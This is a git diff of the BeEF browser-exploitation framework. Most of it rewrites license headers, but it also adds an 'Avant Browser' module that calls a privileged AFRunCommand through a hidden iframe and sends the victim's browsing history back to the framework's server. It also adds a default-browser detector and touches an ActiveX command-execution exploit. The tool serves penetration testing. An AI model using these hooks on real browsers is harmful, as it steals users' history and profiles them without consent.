http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # puts "\nWelcome to the BeEF installer!" diff --git a/install-beef b/install-beef index 5428316c6..ca5b7853a 100644 --- a/install-beef +++ b/install-beef @@ -1,18 +1,8 @@ #!/bin/bash # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # clear diff --git a/modules/browser/avant_steal_history/command.js b/modules/browser/avant_steal_history/command.js new file mode 100644 index 000000000..6eb89b905 --- /dev/null +++ b/modules/browser/avant_steal_history/command.js @@ -0,0 +1,51 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + + + + var avant_iframe = document.createElement("iframe"); + //var avant_iframe = beef.dom.createInvisibleIframe(); + avant_iframe.setAttribute('src', "browser:home"); + avant_iframe.setAttribute('name','test2'); + avant_iframe.setAttribute('width','0'); + avant_iframe.setAttribute('heigth','0'); + avant_iframe.setAttribute('scrolling','no'); + + document.body.appendChild(avant_iframe); + + var vstr = {value: ""}; + + if(window['test2'].navigator) { + //This works if FF is the rendering engine + window['test2'].navigator.AFRunCommand(<%= @cId %>, vstr); + beef.net.send("<%= @command_url %>", <%= @command_id %>, vstr.value); + + } + else { + // this works if Chrome is the rendering engine + //window['test2'].AFRunCommand(60003, vstr); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "Exploit failed. Rendering engine is not set to Firefox"); + + } + + + + + + +}); + diff --git a/modules/exploits/safari_launch_app/config.yaml b/modules/browser/avant_steal_history/config.yaml old mode 100755 new mode 100644 similarity index 62% rename from modules/exploits/safari_launch_app/config.yaml rename to modules/browser/avant_steal_history/config.yaml index ba9de7df2..ab161494f --- a/modules/exploits/safari_launch_app/config.yaml +++ b/modules/browser/avant_steal_history/config.yaml @@ -15,12 +15,11 @@ # beef: module: - safari_launch_app: + avant_steal_history: enable: true - category: "Exploits" - name: "Safari Launch App" - description: "Launch an application from the victim machine.

See CVE-2011-3230 for more details.

Safari <= 5.1 on OS X is vulnerable. Original discovery by Aaron Sigel." - authors: ["antisnatchor"] + category: "Browser" + name: "Get Visited URLs (Avant Browser)" + description: "Invoke AFRunCommand() privileged function. The integer 60003 is passed by default to dump the Avant Browser history." + authors: ["Roberto Suggi Liverani"] target: - user_notify: ["S"] - not_working: ["All"] + working: ["ALL"] diff --git a/modules/exploits/activex_command_execution/module.rb b/modules/browser/avant_steal_history/module.rb old mode 100755 new mode 100644 similarity index 75% rename from modules/exploits/activex_command_execution/module.rb rename to modules/browser/avant_steal_history/module.rb index c8dd70d8c..7a819fa5e --- a/modules/exploits/activex_command_execution/module.rb +++ b/modules/browser/avant_steal_history/module.rb @@ -13,12 +13,17 @@ # See the License for the specific language governing permissions and # limitations under the License. # -class Activex_command_execution < BeEF::Core::Command +class Avant_steal_history < BeEF::Core::Command def self.options + + configuration = BeEF::Core::Configuration.instance + + return [ - {'name' => 'cmd', 'ui_label'=>'Command', 'type' => 'textarea', 'value' =>'cmd.exe /c "echo Hello from BeEF! & pause"', 'width' => '400px', 'height' => '50px'} + {'name' => 'cId', 'ui_label' => 'Command ID:', 'value' => '60003', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' } ] + end def post_execute diff --git a/modules/browser/browser_fingerprinting/command.js b/modules/browser/browser_fingerprinting/command.js index 3f9012df6..5e21d4775 100644 --- a/modules/browser/browser_fingerprinting/command.js +++ b/modules/browser/browser_fingerprinting/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var browser_type = new Array; diff --git a/modules/browser/browser_fingerprinting/config.yaml b/modules/browser/browser_fingerprinting/config.yaml index 0e9c2ea94..e5a8b5437 100644 --- a/modules/browser/browser_fingerprinting/config.yaml +++ b/modules/browser/browser_fingerprinting/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/browser_fingerprinting/module.rb b/modules/browser/browser_fingerprinting/module.rb index ad2157d29..d15b057f5 100644 --- a/modules/browser/browser_fingerprinting/module.rb +++ b/modules/browser/browser_fingerprinting/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # Uses methods described here: # http://www.itsecuritysolutions.org/2010-03-29_fingerprinting_browsers_using_protocol_handlers/ diff --git a/modules/browser/detect_default_browser/command.js b/modules/browser/detect_default_browser/command.js new file mode 100644 index 000000000..8f004e4f0 --- /dev/null +++ b/modules/browser/detect_default_browser/command.js @@ -0,0 +1,28 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +// Written by unsticky +// Ported to BeEF by bcoles +// For more information see http://ha.ckers.org/blog/20070319/detecting-default-browser-in-ie/ + +beef.execute(function() { + + var mt = document.mimeType; + + if (mt) { + if (mt == "Safari Document") result = "Safari"; + if (mt == "Firefox HTML Document") result = "Firefox"; + if (mt == "Chrome HTML Document") result = "Chrome"; + if (mt == "HTML Document") result = "Internet Explorer"; + if (mt == "Opera Web Document") result = "Opera"; + } else { + result = "Unknown"; + } + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "browser="+result); + +}); + diff --git a/modules/browser/detect_default_browser/config.yaml b/modules/browser/detect_default_browser/config.yaml new file mode 100644 index 000000000..6561949fc --- /dev/null +++ b/modules/browser/detect_default_browser/config.yaml @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + detect_default_browser: + enable: true + category: "Browser" + name: "Detect Default Browser" + description: "This module detects which browser is configured as the default web browser." + authors: ["unsticky", "bcoles"] + target: + working: ["IE"] + not_working: ["All"] diff --git a/modules/browser/detect_default_browser/module.rb b/modules/browser/detect_default_browser/module.rb new file mode 100644 index 000000000..5fd5764d4 --- /dev/null +++ b/modules/browser/detect_default_browser/module.rb @@ -0,0 +1,14 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Detect_default_browser < BeEF::Core::Command + + def post_execute + content = {} + content['browser'] = @datastore['browser'] if not @datastore['browser'].nil? + save content + end + +end diff --git a/modules/browser/detect_firebug/command.js b/modules/browser/detect_firebug/command.js index 6887c3554..bf656bc2d 100644 --- a/modules/browser/detect_firebug/command.js +++ b/modules/browser/detect_firebug/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var result = "Not in use or not installed"; if (window.console && (window.console.firebug || window.console.exception)) result = "Enabled and in use!"; diff --git a/modules/browser/detect_firebug/config.yaml b/modules/browser/detect_firebug/config.yaml index 50f54194b..10e011191 100644 --- a/modules/browser/detect_firebug/config.yaml +++ b/modules/browser/detect_firebug/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/detect_firebug/module.rb b/modules/browser/detect_firebug/module.rb index 326d375d2..4a1515fc9 100644 --- a/modules/browser/detect_firebug/module.rb +++ b/modules/browser/detect_firebug/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Detect_firebug < BeEF::Core::Command diff --git a/modules/browser/detect_popup_blocker/command.js b/modules/browser/detect_popup_blocker/command.js index 29b785aba..cf64e2e21 100644 --- a/modules/browser/detect_popup_blocker/command.js +++ b/modules/browser/detect_popup_blocker/command.js @@ -1,20 +1,11 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { - beef.net.send("<%= @command_url %>", <%= @command_id %>, "popup_blocker_enabled="+beef.browser.popup.blocker_enbabled()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "popup_blocker_enabled="+beef.browser.popup.blocker_enabled()); }); diff --git a/modules/browser/detect_popup_blocker/config.yaml b/modules/browser/detect_popup_blocker/config.yaml index 2a1789fac..c5cee313a 100644 --- a/modules/browser/detect_popup_blocker/config.yaml +++ b/modules/browser/detect_popup_blocker/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/detect_popup_blocker/module.rb b/modules/browser/detect_popup_blocker/module.rb index 85f4bc718..285d69ebe 100644 --- a/modules/browser/detect_popup_blocker/module.rb +++ b/modules/browser/detect_popup_blocker/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Detect_popup_blocker < BeEF::Core::Command diff --git a/modules/browser/detect_unsafe_activex/command.js b/modules/browser/detect_unsafe_activex/command.js index b83317dec..cae5083bf 100644 --- a/modules/browser/detect_unsafe_activex/command.js +++ b/modules/browser/detect_unsafe_activex/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var unsafe = true; diff --git a/modules/browser/detect_unsafe_activex/config.yaml b/modules/browser/detect_unsafe_activex/config.yaml index 6cb65983d..a64fe7fcf 100644 --- a/modules/browser/detect_unsafe_activex/config.yaml +++ b/modules/browser/detect_unsafe_activex/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/detect_unsafe_activex/module.rb b/modules/browser/detect_unsafe_activex/module.rb index 9f7947d56..5504ceec2 100644 --- a/modules/browser/detect_unsafe_activex/module.rb +++ b/modules/browser/detect_unsafe_activex/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Detect_unsafe_activex < BeEF::Core::Command diff --git a/modules/browser/get_visited_domains/command.js b/modules/browser/get_visited_domains/command.js index d2c04fac1..7e55b8b8c 100644 --- a/modules/browser/get_visited_domains/command.js +++ b/modules/browser/get_visited_domains/command.js @@ -1,19 +1,10 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + var hidden_iframe = beef.dom.createInvisibleIframe(); hidden_iframe.setAttribute('id','f'); hidden_iframe.setAttribute('name','f'); diff --git a/modules/browser/get_visited_domains/config.yaml b/modules/browser/get_visited_domains/config.yaml index ee2921948..b552f4e10 100644 --- a/modules/browser/get_visited_domains/config.yaml +++ b/modules/browser/get_visited_domains/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/get_visited_domains/module.rb b/modules/browser/get_visited_domains/module.rb index 8effcac55..206e41243 100644 --- a/modules/browser/get_visited_domains/module.rb +++ b/modules/browser/get_visited_domains/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_visited_domains < BeEF::Core::Command diff --git a/modules/browser/get_visited_urls/command.js b/modules/browser/get_visited_urls/command.js index acffd1b22..a31bfe665 100644 --- a/modules/browser/get_visited_urls/command.js +++ b/modules/browser/get_visited_urls/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var results = beef.browser.hasVisited("<%== format_multiline(@urls) %>"); var comp = ''; diff --git a/modules/browser/get_visited_urls/config.yaml b/modules/browser/get_visited_urls/config.yaml index 02f2cc7b2..81363c1ae 100644 --- a/modules/browser/get_visited_urls/config.yaml +++ b/modules/browser/get_visited_urls/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/get_visited_urls/module.rb b/modules/browser/get_visited_urls/module.rb index 5cd8626a5..4454023e6 100644 --- a/modules/browser/get_visited_urls/module.rb +++ b/modules/browser/get_visited_urls/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_visited_urls < BeEF::Core::Command diff --git a/modules/browser/hooked_domain/ajax_fingerprint/command.js b/modules/browser/hooked_domain/ajax_fingerprint/command.js index ccb2bf83c..5fb2bf6c3 100644 --- a/modules/browser/hooked_domain/ajax_fingerprint/command.js +++ b/modules/browser/hooked_domain/ajax_fingerprint/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { //Regular expression to match script names in source diff --git a/modules/browser/hooked_domain/ajax_fingerprint/config.yaml b/modules/browser/hooked_domain/ajax_fingerprint/config.yaml index 8216f7223..1458ac7ae 100644 --- a/modules/browser/hooked_domain/ajax_fingerprint/config.yaml +++ b/modules/browser/hooked_domain/ajax_fingerprint/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/hooked_domain/ajax_fingerprint/module.rb b/modules/browser/hooked_domain/ajax_fingerprint/module.rb index 279cccf47..68227c438 100644 --- a/modules/browser/hooked_domain/ajax_fingerprint/module.rb +++ b/modules/browser/hooked_domain/ajax_fingerprint/module.rb @@ -1,17 +1,8 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. class Ajax_fingerprint < BeEF::Core::Command diff --git a/modules/browser/hooked_domain/alert_dialog/command.js b/modules/browser/hooked_domain/alert_dialog/command.js index a5f5e57c5..81d57d9e7 100644 --- a/modules/browser/hooked_domain/alert_dialog/command.js +++ b/modules/browser/hooked_domain/alert_dialog/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { alert("<%== format_multiline(@text) %>"); diff --git a/modules/browser/hooked_domain/alert_dialog/config.yaml b/modules/browser/hooked_domain/alert_dialog/config.yaml index 2b9c05a1b..2ff2ea2d0 100644 --- a/modules/browser/hooked_domain/alert_dialog/config.yaml +++ b/modules/browser/hooked_domain/alert_dialog/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/hooked_domain/alert_dialog/module.rb b/modules/browser/hooked_domain/alert_dialog/module.rb index a1750451a..b4eea8e80 100644 --- a/modules/browser/hooked_domain/alert_dialog/module.rb +++ b/modules/browser/hooked_domain/alert_dialog/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Alert_dialog < BeEF::Core::Command diff --git a/modules/browser/hooked_domain/deface_web_page/command.js b/modules/browser/hooked_domain/deface_web_page/command.js index feff12512..b78cce34d 100644 --- a/modules/browser/hooked_domain/deface_web_page/command.js +++ b/modules/browser/hooked_domain/deface_web_page/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) 